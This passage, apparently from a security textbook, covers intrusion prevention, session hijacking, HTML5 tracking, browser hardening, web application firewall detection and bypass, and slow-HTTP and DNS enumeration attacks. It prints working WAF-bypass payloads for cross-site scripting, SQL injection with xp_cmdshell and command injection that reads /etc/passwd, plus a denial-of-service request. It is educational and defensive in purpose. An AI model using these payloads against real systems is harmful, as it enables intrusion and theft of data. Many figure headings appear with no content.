prevent/block intrusions that are detected. More specifically, IPS can take such actions as sending an
alarm, dropping the malicious packets, resetting the connection and/or blocking the traffic from the
offending IP address. An IPS can also correct Cyclic Redundancy Check (CRC) errors, un-fragment packet
streams, prevent TCP sequencing issues, and clean up unwanted transport and network layer options
255 | P a g e
IPS Types
1. Network-based intrusion prevention system (NIPS): monitors the entire network for suspicious
traffic by analyzing protocol activity.
2. Wireless intrusion prevention systems (WIPS): monitors a wireless network for suspicious
traffic by analyzing wireless networking protocols.
3. Network behavior analysis (NBA): examines network traffic to identify threats that generate
unusual traffic flows, such as distributed denial of service (DDoS) attacks, certain forms of
malware, and policy violations.
4. Host-based intrusion prevention system (HIPS): an installed software package which monitors
a single host for suspicious activity by analyzing events occurring within that host.
Detection Methods
1. Signature-Based Detection: This method of detection utilizes signatures, which are attack
patterns that are preconfigured and predetermined. A signature-based intrusion prevention system
monitors the network traffic for matches to these signatures. Once a match is found the intrusion
prevention system takes the appropriate action. Signatures can be exploit-based or vulnerability-
based. Exploit-based signatures analyze patterns appearing in exploits being protected against,
while vulnerability-based signatures analyze vulnerabilities in a program, its execution, and
conditions needed to exploit said vulnerability.
2. Statistical anomaly-based detection: This method of detection baselines performance of average
network traffic conditions. After a baseline is created, the system intermittently samples network
traffic, using statistical analysis to compare the sample to the set baseline. If the activity is outside
the baseline parameters, the intrusion prevention system takes the appropriate action.
3. Stateful Protocol Analysis Detection: This method identifies deviations of protocol states by
comparing observed events with “predetermined profiles of generally accepted definitions of
benign activity.
256 | P a g e
Signature Catalog:
257 | P a g e
Alert Monitoring:
258 | P a g e
Security Reporting:
259 | P a g e
Alert Monitor:
260 | P a g e
Anti-Virus:
Web content protection & filtering
Session Hi-Jacking and Internal Network Man-In-The-
Middle
XSS Attack Vector
The attack flow:
1. The attacker finds an XSS vulnerability in the server/website/web application
2. The attacker creates an encoded URL attack string to decrease suspicion level
3. The attacker spreads the link to a targeted victim or to a distribution list
4. The victim logs into the web application, clicks the link
5. The attacker’s code is executed under the victims credentials and sends the unique
session identifier to the attacker
261 | P a g e
6. The attacker plants the unique session identifier in his browser and is now connected to
the system as the victim
The Man-In-The-Middle Attack Vector
• Taking over an active session to a computer system
• In order to attack the system, the attacker must know the protocol/method being used to
handle the active sessions with the system
• In order to attack the system, the attacker must achieve the user’s session identifier
(session id, session hash, token, IP)
• The most common use of Session Hi-jacking revolves around textual protocols such as
the HTTP protocol where the identifier is the ASPSESSID/PHPSESSID/JSESSION
parameter located HTTP Cookie Header aka “The Session Cookie”
• Most common scenarios of Session Hi-Jacking is done with combination with:
• XSS - Where the session cookie is read by an attacker’s JavaScript code
• Man-In-The-Middle – Where the cookie is sent over clear-text HTTP through the
attacker’s machine, which becomes the victim’s gateway
262 | P a g e
263 | P a g e
264 | P a g e
265 | P a g e
266 | P a g e
HTML5 and New Client-Side Risks
Cookie/Repository User Tracking
Tracking Users Using HTML5 Local Storage Feature
• HTML5 provides feature that
allows planting persistent
information in users computers
• A tracker can be planted pre-emptively or during an identified attack
• Since the information is persistent
it is possible to retrieve it and
inspect it at any date and the attacker can be identified
267 | P a g e
Tracking Users Using HTML5 Local Storage Feature
• Types of “Ever Cookies” (tracking features)
• Standard HTTP Cookies
• Silverlight Isolated Storage
• Local Shared Objects (Flash Cookies)
• Storing cookies in RGB values of auto-generated, force-cached PNGs using HTML5
Canvas tag to read pixels (cookies) back out
• Storing cookies in and reading out Web History
• Storing cookies in HTTP ETags
• Internet Explorer userData storage
• HTML5 Session Storage
• HTML5 Local Storage
• HTML5 Global Storage
• HTML5 Database Storage via SQLite
268 | P a g e
User TraceBack Techniques
JAVA Trackback Techniques
269 | P a g e
MAC ADDRESS Detection Of All Network Interfaces via
JAVA
You can steal the user’s MAC address with Java 1.6. For Internet Explorer you can use an applet.
This information is very sensitive, because the MAC address is a unique identifier. Although it
can be easily changed by the user, it can be useful to identify some users with dynamic IP address
or using proxies.
function get_mac() {
try {
var ifaces = java.net.NetworkInterface.getNetworkInterfaces()
var ifaces_list = java.util.Collections.list(ifaces);
for (var i = 0; i < ifaces_list.size(); i++) {
var mac = ifaces_list.get(i).getHardwareAddress();
if (mac) {
return mac;
}
}
} catch (e) { }
return false;
270 | P a g e
}
XSS + Browser Location Services
Browser/Smart-Phone Location Services
Browser Location Services (FireFox)
271 | P a g e
Browser Location Services
(Google Chrome)
272 | P a g e
Browser Location Services
Working Behind Tor Anonymity Network
273 | P a g e
Use your power to protect and enforce – GPO
Policy name Policy path
Prevent Deleting Download History Windows ComponentsInternet
ExplorerDelete Browsing History
Disable add-on performance notifications Windows ComponentsInternet Explorer
Enable alternative codecs in HTML5 media elements Windows ComponentsInternet
ExplorerInternet Control
PanelAdvanced settingsMultimedia
Allow Internet Explorer 8 Shutdown Behavior Windows ComponentsInternet Explorer
Install binaries signed by MD2 and MD4 signing technologies Windows ComponentsInternet
ExplorerSecurity FeaturesBinary
Behavior Security Restriction
Automatically enable newly installed add-ons Windows ComponentsInternet Explorer
Turn off Managing SmartScreen Filter Windows ComponentsInternet Explorer
Prevent configuration of top result search in the Address bar Windows ComponentsInternet
ExplorerInternet SettingsAdvanced
settingsSearching
Prevent Deleting ActiveX Filtering and Tracking Protection
data
Windows ComponentsInternet
ExplorerDelete Browsing History
Go to an intranet site for a single word entry in the Address bar Windows ComponentsInternet
ExplorerInternet SettingsAdvanced
settingsBrowsing
Show tabs below Address bar Windows ComponentsInternet
ExplorerToolbars
Prevent users from bypassing SmartScreen Filter's application
reputation warnings about files that are not commonly
downloaded from the Internet
Windows ComponentsInternet Explorer
Disable Browser Geolocation Windows ComponentsInternet
274 | P a g e
Explorer
Turn off ability to pin sites Windows ComponentsInternet Explorer
Turn on ActiveX Filtering Windows ComponentsInternet Explorer
Configure Tracking Protection Lists Windows ComponentsInternet
ExplorerPrivacy
Tracking Protection Threshold Windows ComponentsInternet
ExplorerPrivacy
Turn off Tracking Protection Windows ComponentsInternet
ExplorerPrivacy
 Prevent users from bypassing SmartScreen Filter’s applications reputation warnings about files that are not
commonly downloaded from the Internet
 Prevent Deleting Download History
275 | P a g e
 Install binaries signed by MD2 and MD4 signing technologies
 Do not automatically enable newly installed add-ons
276 | P a g e
 Turn off Managing SmartScreen Filter
 Turn on ActiveX filtering
277 | P a g e
 Enable alternate codecs in HTML5 media elements
 Prevent Deleting ActiveX Filtering and Tracking Protection data
278 | P a g e
 Disable Browser Geolocation (“Browser Location Services”)
279 | P a g e
Make sure Internet Explorer Protected Mode Is Enforced:
280 | P a g e
Choosing, Implementing and Testing Web Application
Firewalls
Web applications have some serious vulnerabilities, and WAF provides a very important extra
protection layer to the web solution. Hackers can find access points through errors in code, and
we find that having a WAF in front of our web application is very important for security.
WAF acts as a special mechanism governing the interaction between the server and client while
processing the HTTP-packets. It also provides a way to monitor the data as it is received from the
outside. The solution is based on a set of rules that exposes if there is an attack targeting the
server. Usually, the web application firewall aims to protect large websites like banks, online
retailers, social networks, large companies… But now anyone can use it now that we have some
open-source solutions available.
WAF can be implemented in two ways, via hardware or software, and in three forms:
1. Implemented as a reverse proxy server.
2. Implemented in routing mode / bridge.
3. Integrated in the Web application.
The first form can be as mod_security , Barracuda , nevisProxy . These types of WAF
Automatically block or redirect the request to the web server without any changes or editing data.
The second category consists mainly of hardware WAF, for example, Imperva SecureSphere
(impervaguard.com). These solutions require additional configuration on the internal network, but
eventually the option gains in productivity.
And finally, the third type implies the existence in the Web application like integrating the WAF
in the CMS.
WAF rules contain a Blacklist (compared with a list of unacceptable actions) and Whitelist
(accepted and permitted actions), for example we can find in the black list strings like: «UNION
SELECT», «< script>», «/ etc / passwd» while whitelist rules may contain a number parameters
value (from0 to 65535).
Detecting Web Application Firewalls
We will now look at how pentesting can detect the WAF server and more importantly how to
bypass it.
Each firewall has a special method in responding that helps in identifying the type of WAF
implemented (fingerprint) for example:
281 | P a g e
• HTTP-response cookies parameters.
• Modifying HTTP-headers to mask the server
• The way of responding to a special data and queries
• The way in closing connection under not authorized actions.
For example, when we launch an attack on mod_security we get 501 error code; WebKnight – the
code 999; Barracuda on cookie-parameter barra_counter_session.
This can certainly help in identifying the WAF, and there are some scanners that can automate the
operation so you will be able to get the information like w3af a framework plug-in
WAF_fingerprint and wafw00f. These tools are important for the pentesting operation.
Next part will be looking at different technics to bypass web application firewall and exploit most
popular vulnerabilities.
Here are several options available in wafw00f:
282 | P a g e
Then I run the wafw00f against the webserver by giving the command:
wafw00f.py http://localhost and here is the result:
The tool can detect the WAF correctly.
283 | P a g e
Bypassing Web Application Firewalls
There is no single ideal system in the world, and this applies to Web application firewalls too
(WAF’s).
While the advantages and positive features far outweigh the negative in WAF’s, one major
problem is there are only a few action rules allowed. The white list is expanding, and requires
more development efforts because it is very important to clearly establish allowed parameters.
The second major problem is that sometimes WAF vendors fail to update their signature
definitions, or do not develop the required security rule on time, and this can put the web server at
risk of attacks.
The first vulnerability is (http://www.security-database.com/detail.php?alert=CVE-2009-1593),
which allows the inserting extra characters in the JavaScript close tag to bypass the XSS
protection mechanisms. An example is shown below:
http://testcases/phptest/xss.php?var=%3Cscript%3Ealert(document.cookie)%3C/script%20ByPas
s%3
Another example (http://www.security-database.com/detail.php?alert=CVE-2009-1594) also
allows remote attackers to bypass certain protection mechanisms via a %0A (encoded newline),
as demonstrated by a %0A in a cross-site scripting (XSS) attack URL.
HTTP Parameter Pollution (HPP)
HPP was first developed by two Italian network experts, Luca Carettoni and Stefano diPaola.
HPP provides an attacker the ability to submit new HTTP-parameters (POST, GET) with multiple
input parameters (query string, post data, cookies, etc.) with same name.
The application may react in unexpected ways and open up new avenues of server-side and
client-side exploitation. The most outstanding example is a vulnerability in IIS + ModSecurity
which allows SQL-injection based attacks on two features:
1. IIS HTTP parameters submit the same name. for Example:
POST /index.aspx?a=1&a=2 HTTP/1.0
Host: www.example.com
Cookie: a=5;a=6
Content-type: text/plain
Content-Length: 7
Connection: close
a=3&a=4
If such a request to IIS/ASP.NET setting a (Request.Params["a"]) is equal to 1,2,3,4,5,6.
2. ModSecurity analyzes the request after that it has been already processed by webserver. And
reject it: http://testcases/index.aspx?id=1+UNION+SELECT+username,password+FROM+users
However the query submitted:
284 | P a g e
POST /index.aspx?a=-1%20union/*&a=*/select/* HTTP/1.0
Host: www.example.com
Cookie: a=*/from/*;a=*/users
Content?Length: 21
a=*/name&a=password/*
The database as a result will do the correct query:
SELECT b, c FROM t WHERE a =- 1 /*,*/ UNION /*,*/ SELECT /*,*/ username, password
/*,*/ FROM /*,*/ users
XSS
Cross Site Scripting (XSS) is probably the best method for exploiting the Web application
firewall (WAF). This is due to JavaScript’s flexibility. At the BlackHat conference, there were a
large number of methods to trick filters. For example:
object data=”javascript:alert(0)”
isindex action=javascript:alert(1) type=image
img src=x:alert(alt) onerror=eval(src) alt=0
x:script xmlns:x=”http://www.w3.org/1999/xhtml” alert (‘xss’); x: script
Examples:
1. Profense Web Application Firewall Security Bypass Vulnerabilities
Attackers can exploit the issue via a browser.
The following example URIs are available:
http://www.example.com/phptest/xss.php?var=%3CEvil%20script%20goes%20here%3E=%0AB
yPass
http://www.example.com/phptest/xss.php?var=%3Cscript%3Ealert(document.cookie)%3C/script
%20ByPass%3E
2. Finding: IBM Web Application Firewall Bypass
The IBM Web Application Firewall can be evaded, allowing an attacker to exploit web
vulnerabilities that the product intends to protect. The issue occurs when an attacker submits
repeated occurrences of the same parameter.
285 | P a g e
The example shown below uses the following environment:
A web environment using Microsoft IIS, ASP .NET technology, Microsoft SQL Server 2000,
being protected by the IBM Web Application Firewall.
As expected, the following request will be identified and blocked (depending of configuration) by
the IBM Web application firewall.
http://sitename/find_ta_def.aspx?id=2571&iid='; EXEC master..xp_cmdshell "ping 10.1.1.3" --
IIS with ASP.NET (and even pure ASP) technology will concatenate the contents of a parameter
if multiple entries are part of the request.
http://sitename/find_ta_def.aspx?id=2571&iid='; EXEC master..xp_cmdshell &iid= "ping
10.1.1.3" --
IIS with ASP.NET (and even pure ASP) technology will concatenate both entries of iid
parameter, however it will include an comma "," between them, resulting in the following output
being sent to the database.
'; EXEC master..xp_cmdshell , "ping 10.1.1.3" --
The request above will be identified and blocked (depending of configuration) by IBM Web
application firewall, because it appears that
"EXEC" and "xp_cmdshell" trigger an attack pattern.
However, it is possible to split all the spaces in multiple parameters. For example:
http://sitename/find_ta_def.aspx?id=2571&iid=';&iid=EXEC&iid=master..xp_cmdshell&iid="pi
ng 10.1.1.3" &iid= --
The above request will bypass the affected IBM Web application firewall, resulting in the
following output being sent to the database.
'; , EXEC , master..xp_cmdshell , "ping 10.1.1.3" , --
However, the above SQL code will not be properly executed because of the comma inserted on
the SQL query, to solve this situation we will use SQL comments.
http://sitename/find_ta_def.aspx?id=2571&iid='; /*&iid=1*/ EXEC
/*&iid=1*/ master..xp_cmdshell /*&iid=1*/ "ping 10.1.1.3" /*&iid=1*/ --
286 | P a g e
The above request will bypass IBM Web application firewall, resulting in the following output
being sent to the database, which is a valid and working SQL code.
'; /*,1*/ EXEC /*,1*/ master..xp_cmdshell /*,1*/ "ping 10.1.1.3" /*,1*/ --
The above code will execute the ping command on the Microsoft Windows backend, assuming
the application was running with administrative privileges.
This attack class is also referenced sometimes as HTTP Pollution Attack, HTTP Parameter
Pollution (HPP) and HTTP Parameter Concatenation.
The exploitability of this issue depends of the infrastructure (WebServer, Development
Framework Technology, etc) technology being used.
Circumvention of default WAF filtering mechanisms
The following section discusses possibilities to circumvent default filtering mechanisms of the
tested web application firewalls. The perl script for an automated evaluation of filtering
mechanisms developed during this project (see section 4.2) tests the filtering capabilities by
trying to exploit previously known and implemented vulnerabilities. As attacks against web
applications can typically be conducted using a variety of different means (character encoding,
usage of different keywords or functions, obfuscation using comments, etc), the very same attacks
can be conducted by a number of differently assembled requests. As web application firewalls
typically operate using a blacklist approach and allow all requests that do not match the blacklists,
attacks can to some extent be obfuscated and pass the filtering engines.
All attacks that have been marked as blocked by the automated perl script have been analysed
manually to determine the effectiveness of the filtering procedures in connection with that
specific test case. As not all test cases can be covered here and possibilities for circumvention are
partly the same, the following chapter gives an overview of the found options for circumvention.
Please note that the bypass of filtering mechanisms if often demonstrated in connection with a
web application firewall product. The fact that the issue is shown at the example of a product
does not mean that products of other vendors are not also susceptible to the same circumvention
technique shown.
In connection with the test case 601 (command execution) the Hyperguard web application
firewall does not allow to print the contents of the /etc directory (e.g. cat /etc/passwd).
The restriction is only limited on this directory. On the other side an attacker can enumerate all
the server content using the ls command and also read files using the cat-command for files the
user www-data has access to and that are not in the /etc directory. Blocking access to /etc surely
287 | P a g e
lowers the impact of an attack as several configuration files cannot be easily read, but does not
protect other system resources in other directories that can also be used to gather information or
sensitive data.
Another example for incompletely implemented regular expressions for filtering is the easy
bypass of the cross-site scripting filter mechanism of Hyperguard. In the following listing only
the first line is blocked. All other requests are not blocked by the web application firewall and
therefore enable an attacker to include arbitrary script code:
< script > alert (1) </ script >
< script + abc > alert (1) </ script + abc >
< script > alert (1) </ script >
< SCRIPT > alert ( String . fromCharCode (88 ,83 ,83) ) </ SCRIPT >
The following example regarding the BIG-IP web application firewall shows clearly that a
blacklist-based approach in some cases cannot effectively protect a web application
infrastructure. An attack may be slowed down or less experienced attackers using standard exploit
mechanisms may be kept off, but the defense is nevertheless insufficient. The following
demonstration is related to test case 601 (command execution), where an attacker is able to inject
arbitrary commands that are executed with the privileges of the web server. The affected script
enables users to ping hosts by entering an IP address. The given IP address is then passed to the
command line tool ping and the results are echoed back to the user. A normal invocation of the
according PHP script looks like follows:
46Figure 2: Command execution via environment variables obfuscation.
1 cmd_exec . php ? ip =4.2.2.1
If an attacker tries to append additional commands to the parameter, the web application firewall
blocks the request. The following request is for example blocked because the whoami command
matches one of the built-in blacklist filters:
1 cmd_exec . php ? ip =4.2.2.1; whoami
In order to circumvent the filter it is possible to make use of the fact that the Apache web server
by default runs with the privileges of an ordinary user (www-data) which has access to technical
resources and capabilities like other users or processes. That means that the web server process
also has access to environment variables that can be read an written.
An attacker can use this fact to write the command to be executed in parts to environment
variables and execute them afterwards. The following listing shows how the command whoami is
split into two parts, written to environment variables and used for command execution:
1 4.2.2.1; a= who ; b= ami ; $a$b
288 | P a g e
As the request does not match any blacklist filters, it is passed to the web server, where the
command is executed (see figure 2).
The same methodology (using environment variables) can be used to bypass the afore mentioned
restricted access to the /etc directory of the Hyperguard web application firewall.
Whereas the first access attempt in the following listing is denied, the second one leads to
success and reveals the contents of the systems password file:
1 4.2.2.1; cat / etc / passwd
2 4.2.2.1; a= etc ; cat /$a / passwd
Test case 702 (
mysqlinjection get) o
ers a login form which is vulnerable to SQL injection attacks. To bypass the login an attacker
needs to inject SQL syntax in order to instruct the database to return a valid user even if the
passwords to not match. The Hyperguard web application firewall blocks according requests
where injected SQL syntax is recognized. The filter can however be bypassed by entering
comment characters that are not interpreted by the database but circumvent the blacklist filter. In
the following listing the first request is blocked by the web application firewall, but the second
one is forwarded to the web server enabling an attacker to log in as userA without knowledge of
the according password:
471 userA ' or 1=1/*
2 userA '/**/ or 1=1/*
Another problem as far as this test case is concerned occurs in connection with the Mod- Security
web application firewall where the default ruleset can also be bypassed. The attack makes use of
a syntax issue in connection with the MySQL database. Whereas other databases require explicit
comparisons (e.g. or 1=1) to construct a true statement, MySQL also accepts the following
statements as true:
1 or 1
2 or TRUE
3 or version ()
4 or sin (1)
5 ...
289 | P a g e
Whereas the first request in the following listing is blocked (ModSecurity detects the SQL Syntax
because of the single quote in connection with the equality sign), the other requests are passed on
to the web server and are successfully processed by the database. The blacklist filter is bypassed
because of the missing comparison.
1 userA ' or 1=1#
2 userA ' or 1#
3 userA '+ ' '/*
The blacklist filter of phion airlock works according to a multiple keyword matching approach. If
a request contains a single quote or an equality sign, the request is not blocked. The request is
only dropped if it contains both signs at the same time. The same holds true for requests
containing SQL comment signs (--, #, /*).
Beside the possibilities to bypass filtering rules that try to mitigate critical vulnerabilities like
cross-site scripting, command execution and SQL injection, there are also certain areas where the
filtering rules of the tested web application firewalls seem to operate in a reasonable way. The
following areas tended to be hard to circumvent:
• Remote and local file inclusion (possibilities to rewrite requests that still have the same meaning
are limited in this area)
• Cookie-related vulnerabilities (current web application firewalls replace all cookie contents by a
single and randomly chosen cookie)
Whereas some of the blocked vulnerabilities also could not be exploited by rewriting the original
requests of the perl script, it could be shown that the blacklist-approach adopted by web
application firewalls lacks of full coverage of all possible attack vectors. Because of the huge
amount of different encodings, notations and possible syntaxes it is hard to cover all possible
attacks. An additional problem the developers of such blacklists face is that with risen coverage
of attack vectors also the number of false positives rises. While a general blocking of all special
characters (as these are used for command separation or syntax designation in programming
languages) would prevent many vulnerabilities from being exploitable, but this would also render
many web applications useless because of the high number of false positives.
The conclusion of the circumvention attempts carried out by the project team can be summarized
as follows: With a purely blacklist-based approach (as many web application firewalls work
today) there is always a balance between the non-effectiveness of the filter
Mechanisms and the number of false positives (and therefore falsely blocked user requests) the
operators of a web application infrastructure have to face. Even if a first attempt to exploit is
blocked, a 100% coverage of all encoded attacks cannot be achieved.
290 | P a g e
The following descriptions of HTTP requests have been modeled and were used for the testing
efforts:
• HTTP Basic Authentication
• HTTP GET
• HTTP HEAD
• HTTP POST (formdata)
• HTTP POST (urlencoded)
• HTTP SOAP
All descriptions have been used to send data to the web server using the web application
Firewalls as reverse proxies. Therefore the web application Firewalls had to process the
malformed requests.
Results All web application Firewalls have been tested using all developed descriptions during a
period of three weeks. In connection with phion airlock, Breach Security ModSecurity and F5
Networks BIG-IP ASM no implementation flaws in the parsing routines could be detected.
As far as Artofdefence Hyperguard is concerned, a denial of service vulnerability could be found.
The vulnerability was triggered by the test cases 3465 to 3470 of the description for HTTP POST
(formdata). The test cases do not lead to an immediate crash of the system but rather in a high
system load as far as CPU and memory usage are concerned resulting in repeatedly unanswered
requests in the range of the aforementioned test cases. To demonstrate the causes of the
vulnerability, the HTTP request generate by test case 3465 is shown in the following listing:
POST directory / anysite . jsp HTTP /1.1
Host : webapphost . com
User - Agent : Mozilla /5.0 ( Windows ;en - GB ; rv :1.8.0.11) Gecko /20070312
Firefox.../1.5.0.11
Accept : text / xml , text / html ;q =0.9 , text / plain ;q =0.8 , image / png ,*/*; q =0.5
Accept - Language : en -gb , en ;q =0.5
Accept - Encoding : gzip , deflate
Accept - Charset : ISO -8859 -1 , utf -8; q =0.7 ,*; q =0.7
Keep - Alive : 300
Connection : keep – alive
Content - Type : multipart / form - data ; boundary
...= - - - - - - - - - - - - - - - - - - - - - - - - - - -103832778631715
5511 Content - Length : 134217718
- - - - - - - - - - - - - - - - - - - - - - - - - - -103832778631715
Content - Disposition : form - data ; name =" name "
MyName
291 | P a g e
- - - - - - - - - - - - - - - - - - - - - - - - - - -103832778631715
Content - Disposition : form - data ; name =" param2 "
value2
- - - - - - - - - - - - - - - - - - - - - - - - - - -103832778631715 - -
As can be seen, the POST request sends form contents using a valid multipart/form-data
encoding. The abnormality in the shown request can be found in the Content-Length header
which is set to an unreasonably high value not representing the length of the data actually sent. As
far as could be found out without access to the source code of the implementation, the length
value is used to allocate memory on the system. Simultaneously the requests lead to a high CPU
load if sent repeatedly. It could be found out that child processes serving the requests (and
allocating the high amount of memory) are not immediately killed after the (per se too short)
request was finished but persist for several seconds.
By choosing a high Content-Length number and send repeated requests an attacker is therefore
able to consume significant system resources. A denial of service cannot be achieved with a
single request (as long as the attacked system has enough RAM) because Artofdefence
Hyperguard works as a module for the Apache web server which discards requests with a too
high length (depending on the configuration). The vulnerability can be used to provoke a kernel
panic as the values for free RAM and free SWAP space steadily decrease to zero. Afterwards the
system has to be rebooted in order to be functional again.
The vulnerability was reported to the vendor on the 22nd of May 2009 using the bug tracking
system. An updated version of the product is now available.
Figure 4: Successful cross-site scripting attack in Hyperguard management interface.
4.6 Conduction of penetration tests
292 | P a g e
The following chapter covers the results of penetration tests that have been conducted on the web
application firewall administration interfaces. Please note that the tests were only of limited scope
as they were not the main objective of the project. The tests here only cover the administrative
functions of the products that normally are only available to administrators (management
interfaces).
While testing the administrative interfaces it could be found out that they are not covered by the
same ruleset that is applied to the web applications to be protected. In general that enables to
exploit found vulnerabilities more easily than with an additional protective ruleset.
The following URL demonstrates a cross-site scripting in the management interface of the tested
version of Hyperguard (already fixed in the current release):
https://10.25.99.12:8082/adminserver/python/gwtguiserver.py/getDebug?sessioni...%3
Chtml%3E%3Cbody%20onload%3dalert('xss')%3Ed=1
Figure 4 shows the vulnerability that can for example be used to steal cookies or to phish login
data with the help of an unaware user. The vulnerability only affects users of Microsoft’s Internet
Explorer 7 because the browser parses documents where a closing html- and body-tag is missing.
Other browsers do not parse such documents. If the closing tags are included, the web application
firewall masks the brackets and therefore stops the attack. However, there is a second cross-site
scripting vulnerability in the Hyperguard management interface that is interpreted by all
browsers. The vulnerability is triggered when a new user is added by an administrator. If the
username contains script code, the value is printed to the user list without filtering. The impact of
the vulnerability is considered low because it can only be exploited by a user that already has
administrative privileges. Nevertheless it enables an attacker to steal accounts of other
administrative users with possibly higher privileges (e.g. by stealing the cookies using the cross-
site scripting vulnerability).
The vulnerabilities have been reported to the vendor of Hyperguard and are already fixed in the
current release.
The management interface of the F5 Networks BIG-IP web application firewall is also prone to a
cross-site scripting vulnerability. The affected function is used to display error messages in case a
request to the administration interface cannot be served successfully.
293 | P a g e
Figure 5: Successful cross-site scripting attack in BIG-IP management interface.
Error message displayed to the user is not escaped properly, enabling an attacker to insert
arbitrary script code. The vulnerability can be demonstrated by accessing the following URL:
https://192.168.11.13/dms/login.php?msg_id=<script>alert(1)</script>
Figure 5 shows that script code is executed in the context of the browser session enabling an
attacker to steal cookies, etc. At the time of finding the vulnerability was already known by the
vendor and fixed in an updated release.
The web interface of phion airlock is protected by a login that requires a valid username and the
according password. All users of the web interface are also system users and are able to log in via
SSH for example. The fact that users are stored as system users and given the standard Solaris
operation system settings leads to the situation that all passwords are truncated at 8 characters
without a specific warning. This enables an attacker to conduct brute force attempts more easily
even though success is still unlikely if a good password is chosen.
phion airlock (version 4.1-10.41) is also vulnerable to a remote denial of service attack on the
management network interface. This vulnerability affects all protected web servers and
applications, because after exploitation the web application firewall cannot handle any further
requests and must be restarted manually. In order to conduct the denial of service there is no
authentication needed, so the attack can be started by an internal attacker with access to the
management network interface or via cross-site request forgery with a single HTTP GET request.
The vendor describes the vulnerability as follows:
"The airlock Configuration Center shows many system monitoring charts to check the system
status and history. These images are generated on the fly by a CGI script, and the image size is
294 | P a g e
part of the URL parameter. Unreasonably large values for the width and height parameters will
cause excessive resource consumption.
Depending on the actual load and the memory available, the system will be out-of-service for
some minutes or crash completely, making a reboot necessary.
After the initial reporting, further research showed that the vulnerability can also be used to
execute arbitrary system commands. This allows attackers to run operating system commands
under the user of the web server (uid=12359(wwwca) gid=54329(wwwca)). The vulnerability
was reported on April 29th, 2009. According exploits will not be published.
Both security flaws were addressed by a hotfix and were patched with airlock HF4112. The
vulnerabilities are also fixed now within airlock release 4.1-11.18.
Conclusion
The general impression of web application firewall technology gained during this project is that
web application firewalls can indeed raise the security level of certain vulnerable applications.
Nevertheless it must be clearly stated that the additional layer of defense is partly porous and does
not replace the secure development and operation of web applications. It also must not be
overseen that a web application firewall is an additional device that is placed between the client
and the web server and is therefore an additional device that can have influence on the availability
of the overall system. It is also an additional system that can have vulnerabilities or other forms of
implementation flaws and requires regular maintenance.
Additionally it has been shown that web application firewalls can also be the target of successful
attacks (cross-site scripting flaws, cross-site request forgery, denial of service, command
execution, etc.).
When defining rules for a specific web application or modifying the standard ruleset it is very
important to test the whole web application and all provided functions for their correct
functionality. This can for example be done using automated testing frameworks. In the course of
the project often certain functionalities of the web applications used for testing have been
rendered unfunctional because of predefined rules of the web application firewalls.
As unexpected side effects like this can occur with every change of the rules or the web
application itself, comprehensive testing is necessary.
The use of web application firewalls can generally be recommended for virtual patching
purposes. That means that between the emerging of a new and previously unknown vulnerability
and the deployment of the new and tested release possible attacks to the vulnerable application
can be blocked by the web application firewall. That also gives developers and testers more time
to develop a source code patch while the vulnerability is virtually patched in the meantime.
Additionally, web application firewalls can also provide a baseline protection
295 | P a g e
Certain vulnerabilities of the application are protected, even if they are not yet. An organization
using web application firewalls must however be aware that these products cannot cover all
vulnerability classes at the same level. The vulnerable test applications developed in the course of
this project have been used to determine which classes are covered to which degree.
Whereas vulnerability classes like browser-based attacks, interpreter injection and inclusion of
external content have been covered in 60-70% of all cases, other classes like information
disclosure or brute force are hardly handled. Whether the reached percentage provides enough
protection for a certain application must be decided individually for each case. Generally
speaking, the protection level for the three vulnerability classes mentioned above was higher than
expected. It is nevertheless advisable to invest in the secure development of web applications and
not just in web application firewalls as certain vulnerability classes can hardly be covered or
requires that vulnerabilities of the application to be protected are already known.
296 | P a g e
High Level Distributed Denial of Service
R-U-Dead-Yet
R-U-Dead-Yet, or RUDY for short, implements the generic HTTP DoS attack via long form field
submissions. More technical details about layer-7 DDoS attacks can be found in this OWASP
lecture:
This tool runs with an interactive console menu, automatically detecting forms within given URL,
and allowing the user to choose which forms and form fields are desirable to use for the POST
attack. In addition, the tool offers unattended execution by providing the necessary parameters
within a configuration file. In version 2.x RUDY supports SOCKS proxies and session
persistence using cookies when available.
The Past
297 | P a g e
SlowRois
Slowloris is a piece of software written by Robert "RSnake" Hansen which allows a single
machine to take down another machine's web server with minimal bandwidth and side effects on
unrelated services and ports.
Slowloris tries to keep many connections to the target web server open and hold them open as
long as possible. It accomplishes this by opening connections to the target web server and sending
a partial request. Periodically, it will send subsequent HTTP headers, adding to—but never
completing—the request. Affected servers will keep these connections open, filling their
maximum concurrent connection pool, eventually denying additional connection attempts from
clients.
298 | P a g e
PyLoris:
QSlowloris
299 | P a g e
Slowloris Mitigation:
300 | P a g e
Protecting DNS Servers & Detecting DNS Enumeration
Attacks
The following enumeration techniques are based on the DNS protocol and are:
• Reverse DNS lookup Performs a PTR request to get the host name from IP address.
• Name servers record lookup Get the authoritative name server for each domain enumerated on
the target host.
• Mail exchange record lookup Get the MX records for each domain enumerated on the target
host.
• DNS AXFR zone transfer
The name server that serves the target machine's domain zone can be prone to a zone transfer
vulnerability. This allow an attacker to perform a AXFR zone transfer and get a dump of the
complete DNS zone, so all records, served by this name server. The AXFR vulnerability can
already simply be checked with dig utility. For example if we want to check the DNS server
1.2.3.4, authoritative name server for domain foo.com.
We can do it with the following syntax and if you get an output like that the DNS server is
vulnerable.
$ dig -t axfr 1.2.3.4 foo.com
; <<>> DiG 9.6.1-P2 <<>> -t axfr 1.2.3.4 foo.com
; (1 server found)
;; global options: + cmd
foo.com. 38400 IN SOA ns1.foo.com. admin.foo.com. 2006081401 28800 3600 604800
38400 foo.com. 38400 IN NS 127.0.0.1.foo.com.
foo.com. 38400 IN MX 10 mta.foo.com.
mta.foo.com. 38400 IN A 192.168.0.3
ns1.foo.com. 38400 IN A 127.0.0.1
www.foo.com. 38400 IN A 192.168.0.2
foo.com. 38400 IN SOA ns1.foo.com. admin.foo.com. 2006081401 28800 3600 604800
301 | P a g e
38400
;; Query time: 0 mse
;; SERVER: 1.2.3.4#53(1.2.3.4)
;; WHEN: Wed De
23 15:27:24 2009
;; XFR size: 7 re
cords (messages 1, bytes 207)
• Host name brute-forcing
Using a brute-forcing tries to guess can host name on the enumerated domain that resolve as the
target IP address. For example if the do-main foo.com has been enumerated the host name
brute-forcer will check for third level names like: www.foo.com, www1.foo.com, db.foo.com
and whatever word listed in the dictionary used.
• DNS TLD expansion
Use a brute-forcing of top level domain part for already enumerated domain. For example, if
the domain foo.com has been enumerated the TLD expansion or TLD brute-forcing plugin will
check for different TLD for the same domain like: foo.org, foo.net, foo.it and whatever TLD
